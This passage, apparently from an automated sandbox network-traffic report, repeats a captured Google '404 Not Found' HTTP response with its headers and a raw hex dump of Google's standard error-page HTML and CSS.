70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 